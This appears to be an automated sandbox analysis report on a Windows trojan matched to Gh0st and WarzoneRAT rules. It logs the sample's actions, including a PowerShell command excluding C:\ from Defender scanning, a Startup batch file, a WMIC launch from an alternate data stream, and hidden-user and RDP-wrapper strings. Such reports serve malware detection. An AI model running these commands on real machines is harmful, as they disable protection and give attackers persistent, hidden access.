            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 0.2.SecuriteInfo.com.Variant.Jaik.73085.20962.exe.3460000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
            Source: 3.2.windowupdate.exe.38d0000.3.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000003.00000003.310084355.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000003.271032927.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000003.310491730.00000000010BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000002.298671123.00000000035AF000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000003.271113826.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000002.525427546.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000003.310053824.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000003.310397605.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000003.00000002.525763010.0000000003A1F000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 00000000.00000003.271046859.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_009BAC800_2_009BAC80
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0072C2D71_2_0072C2D7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00726A481_2_00726A48
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_0072B5AA1_2_0072B5AA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_007293F01_2_007293F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_007215601_2_00721560
            Source: C:\ProgramData\windowupdate.exeCode function: 3_2_00DAAC803_2_00DAAC80
            Source: C:\ProgramData\windowupdate.exeCode function: String function: 00D82900 appears 280 times
            Source: C:\ProgramData\windowupdate.exeCode function: String function: 00D84930 appears 484 times
            Source: C:\ProgramData\windowupdate.exeCode function: String function: 00D50060 appears 49 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: String function: 00994930 appears 438 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: String function: 00992900 appears 239 times
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: String function: 00960060 appears 45 times
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.304140031.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Variant.Jaik.73085.20962.exe
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000000.255531379.0000000000B34000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Variant.Jaik.73085.20962.exe
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeBinary or memory string: OriginalFilenameATLDUCK.DLL> vs SecuriteInfo.com.Variant.Jaik.73085.20962.exe
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeReversingLabs: Detection: 17%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeJump to behavior
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\ProgramData\windowupdate.exe C:\ProgramData\windowupdate.exe
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeProcess created: C:\ProgramData\windowupdate.exe C:\ProgramData\windowupdate.exeJump to behavior
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
            Source: C:\ProgramData\windowupdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create '"C:\ProgramData:ApplicationData"'Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Local\Microsoft Vision\Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tacmmont.cza.ps1Jump to behavior
            Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winEXE@17/14@0/1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_0094A960 ~Module,~Module,CoCreateInstance,~Module,~Module,StringFromGUID2,~Module,@_RTC_AllocaHelper@12,RegQueryInfoKeyA,RegQueryInfoKeyA,~Module,~Module,~Module,0_2_0094A960
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2460:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4240:120:WilError_01
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:120:WilError_01
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeCode function: 0_2_00942B50 LoadResource,LockResource,SizeofResource,0_2_00942B50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic file information: File size 2054656 > 1048576
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x12a400
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wuser32.pdb source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\Attributes\Advanced\AtlDuck\debug.pdb source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, windowupdate.exe.0.dr, ProgramData_ApplicationData.0.dr
            Source: Binary string: wuser32.pdbUGP source: windowupdate.exe, 00000003.00000002.527122655.0000000005220000.00000040.00001000.00020000.00000000.sdmp, windowupdate.exe, 00000003.00000002.526701012.0000000004E1E000.00000004.00000800.00020000.00000000.sdmp
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            Source: C:\ProgramData\windowupdate.exeUnpacked PE file: 3.2.windowupdate.exe.5220000.5.unpack
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_007220D9 push esp; iretd 1_2_00722139
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00728AC0 pushad ; iretd 1_2_00728AC1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_042BC7EB push eax; ret 1_2_042BC7F1

            Persistence and Installation Behavior

            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\ProgramData:ApplicationDataJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\ProgramData\windowupdate.exeJump to dropped file

            Boot Survival

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.batJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:startJump to behavior

            Hooking and other Techniques for Hiding and Protection

            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.298458664.0000000003474000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: SecuriteInfo.com.Variant.Jaik.73085.20962.exe, 00000000.00000002.297237993.0000000002A60000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
            Source: windowupdate.exe, 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            Source: windowupdate.exe, 00000003.00000002.525655922.00000000038E4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing 